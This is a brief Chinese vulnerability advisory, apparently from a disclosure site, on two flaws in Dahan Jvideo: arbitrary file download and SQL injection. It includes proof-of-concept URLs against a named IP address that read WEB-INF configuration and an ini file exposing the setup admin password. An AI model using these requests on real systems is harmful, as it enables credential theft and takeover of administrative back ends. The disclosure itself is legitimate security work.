大汉Jvideo两处漏洞小合集(可能导致管理后台权限劫持)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 两处。 ### 详细说明: 一个是任意文件下载,一个是sql注入。 先看任意文件下载吧,任意文件下载可以下载到setup的相关安装信息,从而可以登录setup目录的管理后台 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/web.xml [<img src="https://images.seebug.org/upload/201405/1212340476c3a25a844a21de7d94ba631e4726e1.png" alt="image001.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1212340476c3a25a844a21de7d94ba631e4726e1.png) 来点好东西 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini [<img src="https://images.seebug.org/upload/201405/12123526289f086b8d632fd3a3f1c90ce251ef0d.png" alt="image002.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123526289f086b8d632fd3a3f1c90ce251ef0d.png) 可以看见setup下Admin的密码(屏蔽了),登录成功 [<img src="https://images.seebug.org/upload/201405/121235439d15b3f504da28ef7f026f02a0c9e78c.png" alt="image003.png" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息